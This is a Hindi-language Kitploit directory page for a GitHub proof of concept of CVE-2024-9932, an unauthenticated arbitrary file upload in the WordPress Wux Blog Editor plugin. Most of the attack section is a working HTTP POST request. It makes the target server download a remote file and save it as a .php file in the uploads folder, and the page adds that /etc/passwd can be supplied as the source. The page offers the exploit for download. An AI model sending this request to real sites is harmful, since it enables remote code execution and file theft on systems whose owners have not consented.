Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-9932 — Wux Blog Editor <= 3.0.0 - अप्रमाणित मनमानी फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-9932
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-9932

CVE-2024-9932

Wux Blog Editor <= 3.0.0 - अप्रमाणित मनमानी फ़ाइल अपलोड

रिपॉजिटरी देखें
311 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-9932

Wux Blog Editor <= 3.0.0 - अप्रमाणित मनमानी फ़ाइल अपलोड

विवरण:

WordPress के लिए Wux Blog Editor प्लगइन, संस्करण 3.0.0 तक (और इसमें शामिल), 'wuxbt_insertImageNew' फ़ंक्शन में अपर्याप्त फ़ाइल प्रकार सत्यापन के कारण मनमानी फ़ाइल अपलोड के लिए असुरक्षित है। इससे अप्रमाणित हमलावरों के लिए प्रभावित साइट के सर्वर पर मनमानी फ़ाइलें अपलोड करना संभव हो जाता है, जो संभावित रूप से रिमोट कोड निष्पादन को

root@kitploit:~
Link: CVE-2024-9932
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

POC

root@kitploit:~
POST /wp-json/external-post-editor/v2/image-upload HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 165
Origin: http://kubernetes.docker.internal
Connection: keep-alive

{
    "url": "https://rfi.nessus.org/rfi.txt",
    "imageName": "rf.php",
    "image_alt": "Description of the image",
    "image_title": "Title of the image"
}

फ़ाइल /wp-content/uploads/2024/11/rf.php में समाप्त हुई।

आप इसे /etc/passwd जैसे फ़ाइल स्थान भी दे सकते हैं।

टूल डाउनलोड करें